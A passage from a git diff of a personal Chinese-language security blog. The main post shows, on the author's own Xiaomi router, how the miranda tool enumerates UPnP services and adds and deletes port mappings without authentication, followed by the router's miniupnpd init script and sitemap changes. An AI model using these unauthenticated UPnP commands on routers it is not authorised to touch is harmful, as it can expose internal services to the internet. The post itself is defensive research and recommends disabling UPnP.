class="line">Device urn:schemas-upnp-org:device:WANConnectionDevice:1 does not have a presentationURL</span><br><span class="line">Host data enumeration complete!</span><br><span class="line"></span><br><span class="line">upnp&gt; host list</span><br><span class="line"></span><br><span class="line">[0] 192.168.31.1:5351</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0</span><br><span class="line"></span><br><span class="line">xmlFile : http://192.168.31.1:5351/rootDesc.xml</span><br><span class="line">name : 192.168.31.1:5351</span><br><span class="line">proto : http://</span><br><span class="line">serverType : MiWiFi/x UPnP/1.1 MiniUPnPd/2.0</span><br><span class="line">upnpServer : MiWiFi/x UPnP/1.1 MiniUPnPd/2.0</span><br><span class="line">dataComplete : True</span><br><span class="line">deviceList : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList</span><br><span class="line"></span><br><span class="line">InternetGatewayDevice : &#123;&#125;</span><br><span class="line">WANDevice : &#123;&#125;</span><br><span class="line">WANConnectionDevice : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice</span><br><span class="line"></span><br><span class="line">  manufacturerURL : http://miniupnp.free.fr/</span><br><span class="line">  modelName : MiniUPnPd</span><br><span class="line">  UPC : 000000000000</span><br><span class="line">  modelNumber : 20180830</span><br><span class="line">  friendlyName : WANConnectionDevice</span><br><span class="line">  fullName : urn:schemas-upnp-org:device:WANConnectionDevice:1</span><br><span class="line">  modelDescription : MiniUPnP daemon</span><br><span class="line">  UDN : uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8e</span><br><span class="line">  modelURL : http://miniupnp.free.fr/</span><br><span class="line">  manufacturer : MiniUPnP</span><br><span class="line">  services : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice services WANIPConnection</span><br><span class="line"></span><br><span class="line">    eventSubURL : /evt/IPConn</span><br><span class="line">    controlURL : /ctl/IPConn</span><br><span class="line">    serviceId : urn:upnp-org:serviceId:WANIPConn1</span><br><span class="line">    SCPDURL : /WANIPCn.xml</span><br><span class="line">    fullName : urn:schemas-upnp-org:service:WANIPConnection:1</span><br><span class="line">    actions : &#123;&#125;</span><br><span class="line">    serviceStateVariables : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice services WANIPConnection actions</span><br><span class="line"></span><br><span class="line">      AddPortMapping : &#123;&#125;</span><br><span class="line">      GetNATRSIPStatus : &#123;&#125;</span><br><span class="line">      GetGenericPortMappingEntry : &#123;&#125;</span><br><span class="line">      GetSpecificPortMappingEntry : &#123;&#125;</span><br><span class="line">      ForceTermination : &#123;&#125;</span><br><span class="line">      GetExternalIPAddress : &#123;&#125;</span><br><span class="line">      GetConnectionTypeInfo : &#123;&#125;</span><br><span class="line">      GetStatusInfo : &#123;&#125;</span><br><span class="line">      SetConnectionType : &#123;&#125;</span><br><span class="line">      DeletePortMapping : &#123;&#125;</span><br><span class="line">      RequestConnection : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice services WANIPConnection serviceStateVariables</span><br><span class="line"></span><br><span class="line">        InternalClient : &#123;&#125;</span><br><span class="line">        Uptime : &#123;&#125;</span><br><span class="line">        PortMappingLeaseDuration : &#123;&#125;</span><br><span class="line">        PortMappingDescription : &#123;&#125;</span><br><span class="line">        RemoteHost : &#123;&#125;</span><br><span class="line">        PossibleConnectionTypes : &#123;&#125;</span><br><span class="line">        ExternalPort : &#123;&#125;</span><br><span class="line">        RSIPAvailable : &#123;&#125;</span><br><span class="line">        ConnectionStatus : &#123;&#125;</span><br><span class="line">        PortMappingNumberOfEntries : &#123;&#125;</span><br><span class="line">        ExternalIPAddress : &#123;&#125;</span><br><span class="line">        ConnectionType : &#123;&#125;</span><br><span class="line">        NATEnabled : &#123;&#125;</span><br><span class="line">        LastConnectionError : &#123;&#125;</span><br><span class="line">        InternalPort : &#123;&#125;</span><br><span class="line">        PortMappingProtocol : &#123;&#125;</span><br><span class="line">        PortMappingEnabled : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host summary 0</span><br><span class="line"></span><br><span class="line">          Host: 192.168.31.1:5351</span><br><span class="line">          XML File: http://192.168.31.1:5351/rootDesc.xml</span><br><span class="line">          InternetGatewayDevice</span><br><span class="line">          manufacturerURL: http://www.mi.com</span><br><span class="line">          modelName: MiWiFi Router</span><br><span class="line">          UPC: 000000000000</span><br><span class="line">          modelNumber: 20180830</span><br><span class="line">          presentationURL: http://miwifi.com/</span><br><span class="line">          friendlyName: MiWiFi router</span><br><span class="line">          fullName: urn:schemas-upnp-org:device:InternetGatewayDevice:1</span><br><span class="line">          modelDescription: MiWiFi Router</span><br><span class="line">          UDN: uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8c</span><br><span class="line">          modelURL: http://www1.miwifi.com</span><br><span class="line">          manufacturer: Xiaomi</span><br><span class="line">          WANDevice</span><br><span class="line">          manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          modelName: WAN Device</span><br><span class="line">          UPC: 000000000000</span><br><span class="line">          modelNumber: 20180830</span><br><span class="line">          friendlyName: WANDevice</span><br><span class="line">          fullName: urn:schemas-upnp-org:device:WANDevice:1</span><br><span class="line">          modelDescription: WAN Device</span><br><span class="line">          UDN: uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8d</span><br><span class="line">          modelURL: http://miniupnp.free.fr/</span><br><span class="line">          manufacturer: MiniUPnP</span><br><span class="line">          WANConnectionDevice</span><br><span class="line">          manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          modelName: MiniUPnPd</span><br><span class="line">          UPC: 000000000000</span><br><span class="line">          modelNumber: 20180830</span><br><span class="line">          friendlyName: WANConnectionDevice</span><br><span class="line">          fullName: urn:schemas-upnp-org:device:WANConnectionDevice:1</span><br><span class="line">          modelDescription: MiniUPnP daemon</span><br><span class="line">          UDN: uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8e</span><br><span class="line">          modelURL: http://miniupnp.free.fr/</span><br><span class="line">          manufacturer: MiniUPnP</span><br></pre></td></tr></table></figure><ul><li>使用miranda发送UPnP命令<br><strong>获取外部IP地址</strong></li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection GetExternalIPAddress</span><br><span class="line"></span><br><span class="line">NewExternalIPAddress : 172.16.173.231</span><br></pre></td></tr></table></figure><p><strong>增加一个端口映射，将路由器上端口为1900的服务映射到外网端口8080</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection AddPortMapping</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewPortMappingDescription</span><br><span class="line">Data Type:      string</span><br><span class="line">Allowed Values: []</span><br><span class="line">Set NewPortMappingDescription value to: HACK</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewLeaseDuration</span><br><span class="line">Data Type:      ui4</span><br><span class="line">Allowed Values: []</span><br><span class="line">Value Min:      0</span><br><span class="line">Value Max:      604800</span><br><span class="line">Set NewLeaseDuration value to: 0</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewInternalClient</span><br><span class="line">Data Type:      string</span><br><span class="line">Allowed Values: []</span><br><span class="line">Set NewInternalClient value to: 192.168.31.1</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewEnabled</span><br><span class="line">Data Type:      boolean</span><br><span class="line">Allowed Values: []</span><br><span class="line">Set NewEnabled value to: 1</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewExternalPort</span><br><span class="line">Data Type:      ui2</span><br><span class="line">Allowed Values: []</span><br><span class="line">Set NewExternalPort value to: 8080</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewRemoteHost</span><br><span class="line">Data Type:      string</span><br><span class="line">Allowed Values: []</span><br><span class="line">Set NewRemoteHost value to:</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewProtocol</span><br><span class="line">Data Type:      string</span><br><span class="line">Allowed Values: [&apos;TCP&apos;, &apos;UDP&apos;]</span><br><span class="line">Set NewProtocol value to: TCP</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">Argument Name:  NewInternalPort</span><br><span class="line">Data Type:      ui2</span><br><span class="line">Allowed Values: []</span><br><span class="line">Value Min:      1</span><br><span class="line">Value Max:      65535</span><br><span class="line">Set NewInternalPort value to: 1900</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection GetSpecificPortMappingEntry</span><br><span class="line"></span><br><span class="line">  Required argument:</span><br><span class="line">  Argument Name:  NewExternalPort</span><br><span class="line">  Data Type:      ui2</span><br><span class="line">  Allowed Values: []</span><br><span class="line">  Set NewExternalPort value to: 8080</span><br><span class="line"></span><br><span class="line">  Required argument:</span><br><span class="line">  Argument Name:  NewRemoteHost</span><br><span class="line">  Data Type:      string</span><br><span class="line">  Allowed Values: []</span><br><span class="line">  Set NewRemoteHost value to:</span><br><span class="line"></span><br><span class="line">  Required argument:</span><br><span class="line">  Argument Name:  NewProtocol</span><br><span class="line">  Data Type:      string</span><br><span class="line">  Allowed Values: [&apos;TCP&apos;, &apos;UDP&apos;]</span><br><span class="line">  Set NewProtocol value to: TCP</span><br><span class="line"></span><br><span class="line">  NewPortMappingDescription : HACK</span><br><span class="line">  NewLeaseDuration : 0</span><br><span class="line">  NewInternalClient : 192.168.31.1</span><br><span class="line">  NewEnabled : 1</span><br><span class="line">  NewInternalPort : 1900</span><br></pre></td></tr></table></figure><p><strong>可以无需验证地删除映射</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection DeletePortMapping</span><br></pre></td></tr></table></figure></p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555918880/paper/2231.png" alt><br>虽然UPnP是一种很少理解的协议，但它在绝大多数家庭网络上都很活跃，甚至在某些公司网络上也是如此。许多设备支持UPnP以便于消费者使用，但是，它们通常支持不允许任何服务自动执行的操作，尤其是未经授权的情况下。更糟糕的是，协议实现本身很少以安全思维构建，使其可以进一步利用。<br>防止本地/远程利用UPnP的最佳方法是在任何/所有网络设备上禁用该功能。然而，考虑到这个协议和其他“自动魔术”协议旨在帮助懒惰的用户，他们可能不知道这些协议的危险，唯一真正的解决方案是让供应商更加关注他们的设计和实施，并且更加安全。</p><h2 id="浏览配置文件"><a href="#浏览配置文件" class="headerlink" title="浏览配置文件"></a>浏览配置文件</h2><h3 id="通过find命令搜索"><a href="#通过find命令搜索" class="headerlink" title="通过find命令搜索"></a>通过find命令搜索</h3><pre>root@XiaoQiang:/# find -name *upnp*./etc/rc.d/S95miniupnpd./etc/init.d/miniupnpd./etc/hotplug.d/iface/50-miniupnpd./etc/config/upnpd./tmp/upnp.leases./tmp/etc/miniupnpd.conf./tmp/run/miniupnpd.pid./usr/lib/lua/luci/view/web/setting/upnp.htm./usr/sbin/miniupnpd./usr/share/miniupnpd./www/xiaoqiang/web/css/upnp.css./data/etc/rc.d/S95miniupnpd./data/etc/init.d/miniupnpd./data/etc/hotplug.d/iface/50-miniupnpd./data/etc/config/upnpd</pre><ul><li>/etc/rc.d 启动的配置文件和脚本</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br></pre></td><td class="code"><pre><span class="line">!/bin/sh /etc/rc.common</span><br><span class="line"># Copyright (C) 2006-2011 OpenWrt.org</span><br><span class="line"></span><br><span class="line">START=95</span><br><span class="line">SERVICE_USE_PID=1</span><br><span class="line">upnpd_get_port_range() &#123;</span><br><span class="line">        local _var=&quot;$1&quot;; shift</span><br><span class="line">        local _val</span><br><span class="line">        config_get _val &quot;$@&quot;</span><br><span class="line">        case &quot;$_val&quot; in</span><br><span class="line">                [0-9]*[:-][0-9]*)</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_start=$&#123;_val%%[:-]*&#125;&quot;</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_end=$&#123;_val##*[:-]&#125;&quot;</span><br><span class="line">                ;;</span><br><span class="line">                [0-9]*)</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_start=$_val&quot;</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_end=&quot;</span><br><span class="line">                ;;</span><br><span class="line">        esac</span><br><span class="line">&#125;</span><br><span class="line">conf_rule_add() &#123;</span><br><span class="line">        local cfg=&quot;$1&quot;</span><br><span class="line">        local tmpconf=&quot;$2&quot;</span><br><span class="line">        local action external_port_start external_port_end int_addr</span><br><span class="line">        local internal_port_start internal_port_end</span><br><span class="line"></span><br><span class="line">        config_get action &quot;$cfg&quot; action &quot;deny&quot;               # allow or deny</span><br><span class="line">        upnpd_get_port_range &quot;ext&quot; &quot;$cfg&quot; ext_ports &quot;0-65535&quot; # external ports: x, x-y, x:y</span><br><span class="line">        config_get int_addr &quot;$cfg&quot; int_addr &quot;0.0.0.0/0&quot;       # ip or network and subnet mask (internal)</span><br><span class="line">        upnpd_get_port_range &quot;int&quot; &quot;$cfg&quot; int_ports &quot;0-65535&quot; # internal ports: x, x-y, x:y or range</span><br><span class="line"></span><br><span class="line">        # Make a single IP IP/32 so that miniupnpd.conf can use it.</span><br><span class="line">        case &quot;$int_addr&quot; in</span><br><span class="line">                */*) ;;</span><br><span class="line">                *) int_addr=&quot;$int_addr/32&quot; ;;</span><br><span class="line">        esac</span><br><span class="line"></span><br><span class="line">        echo &quot;$&#123;action&#125; $&#123;ext_start&#125;$&#123;ext_end:+-&#125;$&#123;ext_end&#125; $&#123;int_addr&#125; $&#123;int_start&#125;$&#123;int_end:+-&#125;$&#123;int_end&#125;&quot; &gt;&gt;$tmpconf</span><br><span class="line">&#125;</span><br><span class="line">upnpd_write_bool() &#123;                                                                                                   </span><br><span class="line">        local opt=&quot;$1&quot;                                                                                                 </span><br><span class="line">        local def=&quot;$&#123;2:-0&#125;&quot;                                                                                            </span><br><span class="line">        local alt=&quot;$3&quot;                                                                                                 </span><br><span class="line">        local val                                                                                                      </span><br><span class="line"></span><br><span class="line">        config_get_bool val config &quot;$opt&quot; &quot;$def&quot;                                                                       </span><br><span class="line">        if [ &quot;$val&quot; -eq 0 ]; then                                                                                      </span><br><span class="line">                echo &quot;$&#123;alt:-$opt&#125;=no&quot; &gt;&gt; $tmpconf                                                                     </span><br><span class="line">        else                                                                                                           </span><br><span class="line">                echo &quot;$&#123;alt:-$opt&#125;=yes&quot; &gt;&gt; $tmpconf                                                                    </span><br><span class="line">        fi                                                                                                             </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">boot() &#123;                                                                                                               </span><br><span class="line">        return 0                                                                                                       </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">start() &#123;                                                                                                              </span><br><span class="line">        config_load &quot;upnpd&quot;                                                                                            </span><br><span class="line">        local extiface intiface upload download logging secure enabled natpmp                                          </span><br><span class="line">        local extip port usesysuptime conffile serial_number model_number                                              </span><br><span class="line">        local uuid notify_interval presentation_url enable_upnp                                                        </span><br><span class="line">        local upnp_lease_file clean_ruleset_threshold clean_ruleset_interval                                           </span><br><span class="line"></span><br><span class="line">        config_get extiface config external_iface                                                                      </span><br><span class="line">        config_get intiface config internal_iface                                                                      </span><br><span class="line">        config_get extip config external_ip                                                                            </span><br><span class="line">        config_get port config port 5000                                                                               </span><br><span class="line">        config_get upload   config upload                                                                              </span><br><span class="line">        config_get download config download                                                                            </span><br><span class="line">        config_get_bool logging config log_output 0                                                                    </span><br><span class="line">        config_get conffile config config_file                                                                         </span><br><span class="line">        config_get serial_number config serial_number                                                                  </span><br><span class="line">        config_get model_number config model_number                                                                    </span><br><span class="line">        config_get uuid config uuid                                                                                    </span><br><span class="line">        config_get notify_interval config notify_interval                                                              </span><br><span class="line">        config_get presentation_url config presentation_url                                                            </span><br><span class="line">        config_get upnp_lease_file config upnp_lease_file                                                              </span><br><span class="line">        config_get clean_ruleset_threshold config clean_ruleset_threshold                                              </span><br><span class="line">        config_get clean_ruleset_interval config clean_ruleset_interval                                                </span><br><span class="line"></span><br><span class="line">        local args                                                                                                     </span><br><span class="line"></span><br><span class="line">        . /lib/functions/network.sh        </span><br><span class="line">        local ifname                                                                                                   </span><br><span class="line">        network_get_device ifname $&#123;extiface:-wan&#125;                                                                     </span><br><span class="line"></span><br><span class="line">        if [ -n &quot;$conffile&quot; ]; then                                                                                    </span><br><span class="line">                args=&quot;-f $conffile&quot;                                                                                    </span><br><span class="line">        else                                                                                                           </span><br><span class="line">                local tmpconf=&quot;/var/etc/miniupnpd.conf&quot;                                                                </span><br><span class="line">                args=&quot;-f $tmpconf&quot;                                                                                     </span><br><span class="line">                mkdir -p /var/etc                                                                                      </span><br><span class="line"></span><br><span class="line">                echo &quot;ext_ifname=$ifname&quot; &gt;$tmpconf                                                                    </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$extip&quot; ] &amp;&amp; \                                                                                   </span><br><span class="line">                        echo &quot;ext_ip=$extip&quot; &gt;&gt;$tmpconf                                                                </span><br><span class="line"></span><br><span class="line">                local iface                                                                                            </span><br><span class="line">                for iface in $&#123;intiface:-lan&#125;; do                                                                      </span><br><span class="line">                        local device                                                                                   </span><br><span class="line">                        network_get_device device &quot;$iface&quot; &amp;&amp; &#123;                                                        </span><br><span class="line">                                echo &quot;listening_ip=$device&quot; &gt;&gt;$tmpconf                                                 </span><br><span class="line">                        &#125;                                                                                              </span><br><span class="line">                done                                                                                                   </span><br><span class="line"></span><br><span class="line">                [ &quot;$port&quot; != &quot;auto&quot; ] &amp;&amp; \                                                                             </span><br><span class="line">                        echo &quot;port=$port&quot; &gt;&gt;$tmpconf                                                                   </span><br><span class="line"></span><br><span class="line">                config_load &quot;upnpd&quot;                                                                                    </span><br><span class="line">                upnpd_write_bool enable_natpmp 1                             </span><br><span class="line">                upnpd_write_bool enable_upnp 1                               </span><br><span class="line">                upnpd_write_bool secure_mode 1                               </span><br><span class="line">                upnpd_write_bool system_uptime 1    </span><br><span class="line">                [ -n &quot;$upnp_lease_file&quot; ] &amp;&amp; &#123;                                                                         </span><br><span class="line">                        touch $upnp_lease_file                                                                         </span><br><span class="line">                        echo &quot;lease_file=$upnp_lease_file&quot; &gt;&gt;$tmpconf                                                  </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$upload&quot; -a -n &quot;$download&quot; ] &amp;&amp; &#123;                                                                </span><br><span class="line">                        echo &quot;bitrate_down=$(($download * 1024 * 8))&quot; &gt;&gt;$tmpconf                                       </span><br><span class="line">                        echo &quot;bitrate_up=$(($upload * 1024 * 8))&quot; &gt;&gt;$tmpconf                                           </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;presentation_url&#125;&quot; ] &amp;&amp; \                                                                      </span><br><span class="line">                        echo &quot;presentation_url=$&#123;presentation_url&#125;&quot; &gt;&gt;$tmpconf                                         </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;notify_interval&#125;&quot; ] &amp;&amp; \                                                                       </span><br><span class="line">                        echo &quot;notify_interval=$&#123;notify_interval&#125;&quot; &gt;&gt;$tmpconf                                           </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;clean_ruleset_threshold&#125;&quot; ] &amp;&amp; \                                                               </span><br><span class="line">                        echo &quot;clean_ruleset_threshold=$&#123;clean_ruleset_threshold&#125;&quot; &gt;&gt;$tmpconf                           </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;clean_ruleset_interval&#125;&quot; ] &amp;&amp; \                                                                </span><br><span class="line">                        echo &quot;clean_ruleset_interval=$&#123;clean_ruleset_interval&#125;&quot; &gt;&gt;$tmpconf                             </span><br><span class="line"></span><br><span class="line">                [ -z &quot;$uuid&quot; ] &amp;&amp; &#123;                                                                                    </span><br><span class="line">                        uuid=&quot;$(cat /proc/sys/kernel/random/uuid)&quot;                                                     </span><br><span class="line">                        uci set upnpd.config.uuid=$uuid                                                                </span><br><span class="line">                        uci commit upnpd                                                                               </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ &quot;$uuid&quot; = &quot;nocli&quot; ] || \                                                                             </span><br><span class="line">                        echo &quot;uuid=$uuid&quot; &gt;&gt;$tmpconf                                                                   </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;serial_number&#125;&quot; ] &amp;&amp; \                                                                         </span><br><span class="line">                        echo &quot;serial=$&#123;serial_number&#125;&quot; &gt;&gt;$tmpconf                                                      </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;model_number&#125;&quot; ] &amp;&amp; \                                               </span><br><span class="line">                        echo &quot;model_number=$&#123;model_number&#125;&quot; &gt;&gt;$tmpconf        </span><br><span class="line">                        config_foreach conf_rule_add perm_rule &quot;$tmpconf&quot;                                                          </span><br><span class="line">                    fi                                                                                                             </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    if [ -n &quot;$ifname&quot; ]; then                                                                                      </span><br><span class="line">                            # start firewall                                                                                       </span><br><span class="line">                            iptables -L MINIUPNPD &gt;/dev/null 2&gt;/dev/null || fw3 reload                                             </span><br><span class="line"></span><br><span class="line">                            if [ &quot;$logging&quot; = &quot;1&quot; ]; then                                                                          </span><br><span class="line">                                    SERVICE_DAEMONIZE=1 \                                                                          </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd $args -d                                                     </span><br><span class="line">                            else                                                                                                   </span><br><span class="line">                                    SERVICE_DAEMONIZE= \                                                                           </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd $args                                                        </span><br><span class="line">                            fi                                                                                                     </span><br><span class="line">                    else                                                                                                           </span><br><span class="line">                            logger -t &quot;upnp daemon&quot; &quot;external interface not found, not starting&quot;                                   </span><br><span class="line">                    fi                                                                                                             </span><br><span class="line">                    return 0                                                                                                       </span><br><span class="line">            &#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">            stop() &#123;                                                                                                               </span><br><span class="line">                    service_stop /usr/sbin/miniupnpd                                                                               </span><br><span class="line"></span><br><span class="line">                    iptables -t nat -F MINIUPNPD 2&gt;/dev/null                                            </span><br><span class="line">                    iptables -t filter -F MINIUPNPD 2&gt;/dev/null                                         </span><br><span class="line">                    return 0                                                                            </span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure><p>SmartController<br>messagingagent</p>]]></content>
       
       
       <categories>
diff --git a/sitemap.xml b/sitemap.xml
index d3c29da3..9022bcd6 100644
--- a/sitemap.xml
+++ b/sitemap.xml
@@ -1,10 +1,17 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   
+  <url>
+    <loc>https://cool-y.github.io/2019/04/21/XIAOMI-UPnP/</loc>
+    
+    <lastmod>2019-07-11T01:51:28.743Z</lastmod>
+    
+  </url>
+  
   <url>
     <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
     
-    <lastmod>2019-07-10T09:02:29.682Z</lastmod>
+    <lastmod>2019-07-10T11:24:55.927Z</lastmod>
     
   </url>
   
@@ -57,13 +64,6 @@
     
   </url>
   
-  <url>
-    <loc>https://cool-y.github.io/2019/04/21/XIAOMI-UPnP/</loc>
-    
-    <lastmod>2019-05-05T03:00:55.092Z</lastmod>
-    
-  </url>
-  
   <url>
     <loc>https://cool-y.github.io/2019/04/15/Caving-db-storage/</loc>
     
diff --git a/tags/AFL/index.html b/tags/AFL/index.html
index 11feddc3..5c90958e 100644
--- a/tags/AFL/index.html
